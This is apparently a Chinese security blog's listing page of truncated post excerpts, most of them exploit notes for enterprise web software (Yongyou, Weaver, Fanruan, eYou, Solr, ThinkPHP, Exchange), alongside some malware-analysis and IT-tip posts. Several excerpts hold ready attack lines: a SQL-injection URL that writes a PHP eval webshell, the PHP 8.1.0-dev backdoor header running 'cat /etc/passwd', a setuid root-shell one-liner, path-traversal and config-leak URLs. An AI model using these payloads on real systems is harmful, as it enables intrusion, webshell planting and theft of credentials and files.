摘要: 0x00、前言 朋友发来一个图片,说自己买了某宝上steam激活sdk,结果客服发过来一个教程让他下载游戏,想问问我有没有问题。 0x01、看了图片后立刻来了兴趣。 命令很简单,先是IRM远程访问,然后IEX执行。 手动访问了一下cdk.yesilovemyhome.com,发现跳转steam官方商 阅读全文
posted @ 2024-02-28 23:07 r1ch4rd_L 阅读(24247) 评论(23) 推荐(7)
摘要: 搭建KMS 这里使用iStoreOS一键搭建KMS 激活windows slmgr.vbs -upk slmgr.vbs -ipk XXXXX-XXXXX-XXXXX-XXXXX-XXXXX //设置windows密钥 slmgr.vbs -skms KMS_IP //设置kms服务器地址 slmg 阅读全文
posted @ 2025-08-25 00:18 r1ch4rd_L 阅读(310) 评论(0) 推荐(0)
摘要: 问题出现在Chrome139.0.7258.128版本,更新后默认打开无法加载UI。可临时添加--disable-gpu解决 问题描述:打开chrome,出现窗口但无法加载UI 使用任务管理器结束进程、重启系统、更新显卡驱动均无法解决该问题。 使用--disable-gpu打开chrome后,进入设 阅读全文
posted @ 2025-08-18 20:22 r1ch4rd_L 阅读(36) 评论(0) 推荐(0)
摘要: 明源云 ERP 文档服务系统任意文件上传 漏洞类型:文件上传 漏洞路径:待确认 验证方式:待确认 明源ERP sso/login.aspx身份认证绕过 漏洞类型:越权 漏洞路径:/PubPlatform/nav/login/sso/login.aspx 验证方式: POST /PubPlatform 阅读全文
posted @ 2025-07-27 11:02 r1ch4rd_L 阅读(534) 评论(0) 推荐(0)
摘要: 用友NC listUserSharingEvents 存在SQL注入 漏洞类型:SQL注入 利用路径:/portal/pt/oacoSchedulerEvents/listUserSharingEvents 验证方式:/portal/pt/oacoSchedulerEvents/listUserSh 阅读全文
posted @ 2025-07-27 10:49 r1ch4rd_L 阅读(334) 评论(0) 推荐(0)
摘要: 亿邮电子邮件系统远程命令执行漏洞 疑似0day,未知详情 亿邮电子邮件系统认证逻辑缺陷 利用路径:/?q=login.do 亿邮邮件网关 RCE 利用路径:/usr/local/eyou/gateway/ebaselib/bin/pdftotext 验证方式: #!/bin/bash PAYLOAD 阅读全文
posted @ 2025-07-27 08:41 r1ch4rd_L 阅读(336) 评论(1) 推荐(0)
摘要: 哈哈,标题党了 为什么广东电信会把github地址解析成为127.0.0.1 今日访问github,突然发现无法访问,排查dns解析发现解析到127.0.0.1 使用广州电信的首选dns和备用dns的情况下,github解析到127.0.0.1 看到这里我甚至以为我路由器出了问题。 使用nslook 阅读全文
posted @ 2025-04-20 12:04 r1ch4rd_L 阅读(368) 评论(0) 推荐(0)
摘要: 一、缘起 今天正在愉快地玩着坦克世界,正式紧张时刻,突然右下角弹出芒果TV的推广弹框,导致鼠标键盘失焦,结结实实得挨了4005一发。 二、解构 作为网络安全工程师,我的电脑我做主,什么阿猫阿狗都随随便便来弹框肯定是不能接受的。 明明右下角没有运行芒果TV,为什么芒果TV什么进程能够弹框?于是打开任务 阅读全文
posted @ 2025-04-18 19:11 r1ch4rd_L 阅读(107) 评论(0) 推荐(1)
摘要: 一、缘起 周末有个Steam名为“影冰”的用户,通过好友关系添加我为好友。 隔夜我正愉快地玩着史低入手的零感染区,突然收到该用户的消息,并附带一个钓鱼链接。(钓鱼样本:https[://]csmav[.]com/csgo/) 该用户发言一股机翻味道,目测是境外组织。 职业敏感性让我预判了他的预判,直 阅读全文
posted @ 2025-04-12 01:26 r1ch4rd_L 阅读(605) 评论(0) 推荐(0)
摘要: 前情提要:写了一篇清除挖矿脚本的博客,意在帮助大家遇到相似情境下分析并处置。 在垃圾平台尚未通过,经过多次删改依然未通过。而且同一篇文章以各种不同理由不通过,于是有了以下对话。 终于成功发出来。 在与客服沟通的过程中,感觉CSDN的客服全程就是“我不听,我不听,我不听”、“就是你的错”、“你知不知道 阅读全文
posted @ 2021-11-07 10:53 r1ch4rd_L 阅读(297) 评论(0) 推荐(0)
摘要: (1)详细说明 近日我捕获到一个利用Apache2.4.49漏洞(CVE-2021-41773)传播xmrig-6.14.1-linux-static-x64挖矿脚本的最新样本。样本文件名为aaa,file命令判断为ASCII脚本。如下图所示: 直接cat该文件 (2)样本分析 I. 该bash脚本 阅读全文
posted @ 2021-11-01 16:35 r1ch4rd_L 阅读(1089) 评论(2) 推荐(1)
摘要: CVE-2021-41773是一个apache2.4.49的RCE漏洞,可以任意文件读取、远程代码执行 使用shodon.io搜索server: Apache/2.4.49 下载结果(json格式)并解析json脚本,获取url 使用工具批量利用 验证结果 阅读全文
posted @ 2021-11-01 14:41 r1ch4rd_L 阅读(3057) 评论(2) 推荐(1)
摘要: 1、shiro反序列化漏洞综合利用工具 优点:图形化、傻瓜化工具,一键getshell 缺点:利用链少,回显方式少 2、ShiroExploit 基于ysoserial项目开发,payload多 3、ysoserial配合shiro_tool ysoserial工具有多种payload 利用方式: 阅读全文
posted @ 2021-10-25 11:29 r1ch4rd_L 阅读(1840) 评论(1) 推荐(0)
摘要: https://unicode-table.com/en/202E/ 点击copy,复制这个不可见字符 新建文件,名为cod.txt 将该不可见字符复制到文件名最前方即可 原理:使用了不可见的阿拉伯字符,使文件名变成由右向左读的阿拉伯文。 阅读全文
posted @ 2021-10-11 14:32 r1ch4rd_L 阅读(416) 评论(0) 推荐(0)
摘要: Shodan: http.favicon.hash:-1153950306 http.favicon.hash:-2012355198 Fofa: (body="login_box_sonicwall" || header="SonicWALL SSL-VPN Web Server") && bod 阅读全文
posted @ 2021-10-09 17:46 r1ch4rd_L 阅读(2) 评论(0) 推荐(0)
摘要: ES文件浏览器是一款安卓系统常用的文件管理器,有文件管理、HTTP服务等多种功能 在v4.1.9.7.4版本下有个任意文件读取漏洞 exp: # Exploit Title: ES File Explorer 4.1.9.7.4 - Arbitrary File Read # Date: 29/06 阅读全文
posted @ 2021-08-11 17:40 r1ch4rd_L 阅读(604) 评论(0) 推荐(0)
摘要: python3 -c 'import os; os.setuid(0); os.system("/bin/sh")' 阅读全文
posted @ 2021-08-11 17:02 r1ch4rd_L 阅读(547) 评论(0) 推荐(0)
摘要: PHP 8.1.0-dev 版本在2021年3月28日被植入后门,但是后门很快被发现并清除。当服务器存在该后门时,攻击者可以通过发送User-Agentt头来执行任意代码。 添加请求头 User-Agentt: zerodiumsystem("cat /etc/passwd"); 阅读全文
posted @ 2021-08-11 16:30 r1ch4rd_L 阅读(212) 评论(0) 推荐(0)
摘要: 前言 当拿到windows的shell但是没有图形化界面时(如cs的shell、msf的shell、命令执行的shell等),需要查询日志却无法使用日志查看器,可以使用wevtutil工具导出日志文件。 wevtutil工具常用命令 列出所有已注册的事件日志 C:\> wevtutil el 将Sy 阅读全文
posted @ 2021-04-19 09:44 r1ch4rd_L 阅读(4903) 评论(0) 推荐(0)
摘要: 请求包 POST /ormrpc/services/WSCostSharingFacade HTTP/1.1 Content-Type: text/xml; charset=UTF-8 SOAPAction: "getIndexValue" User-Agent: Axis2 Host: 10.8. 阅读全文
posted @ 2021-04-10 21:33 r1ch4rd_L 阅读(946) 评论(0) 推荐(0)
摘要: v10.0版本不受影响 FineReport V9 注意: 这个漏洞是任意文件覆盖,上传 JSP 马,需要找已存在的 jsp 文件进行覆盖 Tomcat 启动帆软后默认存在的 JSP 文件: 比如:/tomcat-7.0.96/webapps/ROOT/index.jsp 覆盖 Tomcat 自带 阅读全文
posted @ 2021-04-09 16:36 r1ch4rd_L 阅读(1097) 评论(0) 推荐(0)
摘要: POST /Upload/upload_file.php?l=1 HTTP/1.1 Host: x.x.x.x User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) C 阅读全文
posted @ 2021-04-09 16:35 r1ch4rd_L 阅读(194) 评论(0) 推荐(0)
摘要: /api/dbstat/gettablessize /webroot/ReportServer?op=fr_base&cmd=evaluate_formula&expression= 阅读全文
posted @ 2021-04-09 16:34 r1ch4rd_L 阅读(333) 评论(0) 推荐(0)
摘要: https://<IP>/api/dp/rptsvcsyncpoint?ccid=1';create table O(T TEXT);insert into O(T) values('<?php @eval($_POST[1]);?>');copy O(T) to '<目标文件写入路径>';drop 阅读全文
posted @ 2021-04-09 16:33 r1ch4rd_L 阅读(701) 评论(0) 推荐(0)
摘要: FOFA语句: title="Jellyfin" 可以通过访问 http://<url>/Audio/anything/hls/<文件路径>/stream.mp3/ 读取任意文件。 POC: http://xxx.xxx.xxx.xxx/Audio/1/hls/..%5C..%5C..%5C..%5 阅读全文
posted @ 2021-04-09 16:32 r1ch4rd_L 阅读(889) 评论(0) 推荐(0)
摘要: /synccache.jsp?data=base64编码的java对象 阅读全文
posted @ 2021-04-09 16:30 r1ch4rd_L 阅读(294) 评论(0) 推荐(0)
摘要: 漏洞位于: /page/exportImport/uploadOperation.jsp文件中 Jsp流程大概是:判断请求是否是multipart请求,然就没有了,直接上传了,啊哈哈哈哈哈 重点关注File file=new File(savepath+filename), Filename参数,是 阅读全文
posted @ 2021-04-09 16:29 r1ch4rd_L 阅读(1621) 评论(0) 推荐(0)
摘要: 漏洞URL: http://106.15.190.147/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=***注入点 在getdata.jsp中,直接将request对象交给 weaver.hrm.common.AjaxManager.getData(HttpS 阅读全文
posted @ 2021-04-09 16:18 r1ch4rd_L 阅读(2923) 评论(0) 推荐(0)
摘要: /latrix/inandout.php txtaccesscode参数存在SQL注入漏洞 阅读全文
posted @ 2021-04-09 16:16 r1ch4rd_L 阅读(56) 评论(0) 推荐(0)
摘要: 漏洞关注点: /sys/search/sys_search_main/sysSearchMain.do?method=editParam&fdParemNames=11&FdParameters=[shellcode] 漏洞在/sys/search/sys_search_main/sysSearch 阅读全文
posted @ 2021-04-09 16:13 r1ch4rd_L 阅读(2901) 评论(0) 推荐(0)
摘要: 分析发现是去年老洞(https://www.cnblogs.com/0day-li/p/13698863.html) 利用了两个漏洞 1)通过请求直接获取管理员权限cookie 2)通过上传一个压缩文件,调用接口进行文件在解压时会利用解压过程的漏洞利用获取webshell 利用方式: def see 阅读全文
posted @ 2021-04-09 16:12 r1ch4rd_L 阅读(1015) 评论(0) 推荐(0)
摘要: 管理员登录系统系统之后修改密码,未采用原密码校验,且存在未授权访问导致存在越权修改管理员密码。 默认用户superman的uid=1POST /?module-auth_user&action=mod_edit.pwd HTTP/1.1 阅读全文
posted @ 2021-04-09 16:11 r1ch4rd_L 阅读(390) 评论(0) 推荐(0)
摘要: 目前测试影响版本:NC6.5 漏洞url为: /service/~xbrl/XbrlPersistenceServlet poc: import requests import threadpool import urllib3 import sys import base64 ip = "" dn 阅读全文
posted @ 2021-04-09 16:10 r1ch4rd_L 阅读(2071) 评论(0) 推荐(0)
摘要: 漏洞url: http://xxx.xxx/zentaopms_11.6/www/api-getModel-user-getRealNameAndEmails-users=admin http://xxx.xxx/zentaopms_11.6/www/api-getModel-api-sql-sql 阅读全文
posted @ 2021-04-09 16:09 r1ch4rd_L 阅读(731) 评论(0) 推荐(0)
摘要: 影响范围 Apache Solr <= 8.8.1 访问连接确认漏洞存在,并获取应用名 http://example.com/solr/admin/cores?indexInfo=false&wt=json 提交POST请求,触发漏洞 http://example.com/solr/应用名/debu 阅读全文
posted @ 2021-04-09 16:07 r1ch4rd_L 阅读(160) 评论(0) 推荐(0)
摘要: REQUEST: POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.0 Host: Connection: close Content-Length: 85 Cache-Control: max-age=0 Sec-Ch-Ua: "Google C 阅读全文
posted @ 2021-04-09 16:03 r1ch4rd_L 阅读(259) 评论(0) 推荐(0)
摘要: 实战中发现可写文件且内容可控,尝试写入phpinfo,发现分号(;)和尖括号(<>)被转义,如:尝试写入 <?php phpinfo();?> 实际得到: \<?php phpinfo()\;?\> 分析分号(;)和尖括号(<>)两处转义,其中第一个尖括号转义不属于php内部,不起到转义作用,只是一 阅读全文
posted @ 2021-03-24 10:03 r1ch4rd_L 阅读(1117) 评论(1) 推荐(0)
摘要: Thinkphp 5.0.22http://192.168.1.1/thinkphp/public/?s=.|think\config/get&name=database.usernamehttp://192.168.1.1/thinkphp/public/?s=.|think\config/get 阅读全文
posted @ 2020-09-27 11:06 r1ch4rd_L 阅读(1739) 评论(0) 推荐(0)
摘要: Microsoft Exchange远程代码执行漏洞(CVE-2020-16875) 漏洞信息: 由于对cmdlet参数的验证不正确,Microsoft Exchange服务器中存在一个远程执行代码漏洞,该漏洞使攻击者可以通过向受影响的Exchange Server发送特制电子邮件来在SYSTEM执 阅读全文
posted @ 2020-09-21 11:46 r1ch4rd_L 阅读(2963) 评论(0) 推荐(1)
摘要: VMware Fusion cve-2020-3980权限提升 Apache Cocoon security vulnerability cve-2020-11991 Spring框架RFD(文件下载) CVE-2020-0618-SQLServer报表服务远程代码执行漏洞 CVE-2020-711 阅读全文
posted @ 2020-09-20 10:39 r1ch4rd_L 阅读(943) 评论(0) 推荐(0)